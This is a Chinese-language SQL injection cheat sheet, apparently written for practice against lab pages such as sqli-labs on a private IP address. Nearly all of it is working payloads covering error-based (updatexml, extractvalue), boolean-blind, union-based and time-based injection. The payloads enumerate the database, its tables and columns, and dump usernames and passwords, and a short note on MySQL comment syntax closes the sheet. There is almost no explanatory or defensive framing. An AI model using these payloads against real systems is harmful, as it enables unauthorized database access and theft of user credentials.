sql注入常见语句

报错注入：

and updatexml(1,concat(0x7e,(database()),0x7e),1) --+
and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) --+
and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
and updatexml(1,concat(0x7e,(select group_concat(0x7e,id,0x7e,username,0x7e,password,0x7e) from users),0x7e),1) --+

布尔盲注

http://172.168.30.176/web/sql/boolean.php?id=1' and length(database())>=4 --+  正常
http://172.168.30.176/web/sql/boolean.php?id=1' and length(database())>=5 --+  异常
http://172.168.30.176/web/sql/boolean.php?id=1' and substr(database(),1,1)='t' --+
http://172.168.30.176/web/sql/boolean.php?id=1' and substr((select table_name from information_schema.tables where table_schema='test' limit 0,1),1,1)='z' --+
http://172.168.30.176/web/sql/boolean.php?id=1' and substr((select column_name from information_schema.columns where table_schema='test' and table_name='users' limit 0,1),1,1)='z' --+
http://172.168.30.176/web/sql/boolean.php?id=1' and substr((select username from users limit 0,1),1,1)='z' --+

普通注入

http://172.168.30.176/web/sql/union.php?id=1' 报错
http://172.168.30.176/web/sql/union.php?id=1 and 1=1 正常
http://172.168.30.176/web/sql/union.php?id=1 and 1=2 异常
http://172.168.30.176/web/sql/union.php?id=1 order by 6  正常
http://172.168.30.176/web/sql/union.php?id=1 order by 7  报错或异常
http://172.168.30.176/web/sql/union.php?id=-1 union select 1,2,3,4,5,6
http://172.168.30.176/web/sql/union.php?id=-1 union select 1,(database()),3,4,5,6
http://172.168.30.176/web/sql/union.php?id=-1 union select 1,(select table_name from information_schema.tables where table_schema='test' limit 0,1),3,4,5
http://172.168.30.176/web/sql/union.php?id=-1 union select 1,(select column_name from information_schema.columns where table_schema='test' and table_name='users' limit 0,2),3,4,5,6
http://172.168.30.176/web/sql/union.php?id=-1 union select 1,(select group_concat(id,0x3e,username,0x3e,password) from users),3,4,5,6

1 or 1=1 --+
1 or 1=2 --+
union select (select database()),2 --+
union select (select group_concat(table_name) from information_schema.columns where table_schema='security'),2 --+
union select (select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),2 --+
union select (select group_concat(username) from users),2 --+

报错注入：

and extractvalue(1,concat(1,(select database()))) --+
and extractvalue(1,(select group_concat(table_name) from information_schema.columns where table_schema='security')) --+
and extractvalue(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')) --+
and extractvalue(1,(select group_concat(password) from users)) --+

时间盲注：

1" and if(length(database())=8,sleep(6),1) -- 
or if(substr(database(),1,1)='s',sleep(6),1) --+
or if(substr((select table_name from information_schema.columns where table_schema='security' limit 0,1),1,1)='a',sleep(6),1) --+
or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='a',sleep(6),1) --+
or if(substr((select username from users limit 0,1),1,1)='a',sleep(5),1) --+

mysql的注释：
–+ ：一般在URL中使用，–+不在表单中用 ：url 加号（+），会被解析成空格
# ：表单和url中都可以用
– - ：在表单中用